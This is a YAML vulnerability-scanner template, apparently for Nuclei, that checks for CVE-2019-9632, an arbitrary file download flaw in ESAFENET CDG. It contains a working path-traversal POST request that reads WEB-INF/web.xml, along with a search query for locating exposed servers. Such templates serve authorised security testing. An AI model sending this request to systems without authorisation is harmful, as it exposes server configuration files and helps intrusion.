46 lines
1.5 KiB
YAML
46 lines
1.5 KiB
YAML
id: CVE-2019-9632
|
|
|
|
info:
|
|
name: ESAFENET CDG - Arbitrary File Download
|
|
author: pdteam
|
|
severity: high
|
|
description: |
|
|
ESAFENET CDG V3 and V5 has an arbitrary file download vulnerability via the fileName parameter in download.jsp because the InstallationPack parameter is mishandled in a /CDGServer3/ClientAjax request.
|
|
reference:
|
|
- https://github.com/HimmelAward/Goby_POC
|
|
- https://github.com/Z0fhack/Goby_POC
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2019-9632
|
|
epss-score: 0.05368
|
|
epss-percentile: 0.93097
|
|
cpe: cpe:2.3:a:esafenet:electronic_document_security_management_system:v3:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: esafenet
|
|
product: "electronic_document_security_management_system"
|
|
fofa-query: "title=\"电子文档安全管理系统\""
|
|
tags: cve,cve2019,esafenet,lfi
|
|
|
|
http:
|
|
- method: POST
|
|
path:
|
|
- "{{BaseURL}}/CDGServer3/ClientAjax"
|
|
|
|
headers:
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
body: |
|
|
command=downclientpak&InstallationPack=../WEB-INF/web.xml&forward=index.jsp
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
- type: word
|
|
words:
|
|
- "<servlet-name>CDGPermissions</servlet-name>"
|
|
# digest: 4b0a00483046022100ec4949b3b2d4acb6481239e29b0bc11adec43ee83dc158bd36713227e1773414022100ed38f18a585bda6e3e86c8fd11e6c024bb59f285a9b3e3585cd4ee94184d6757:922c64590222798bb761d5b6d8e72950 |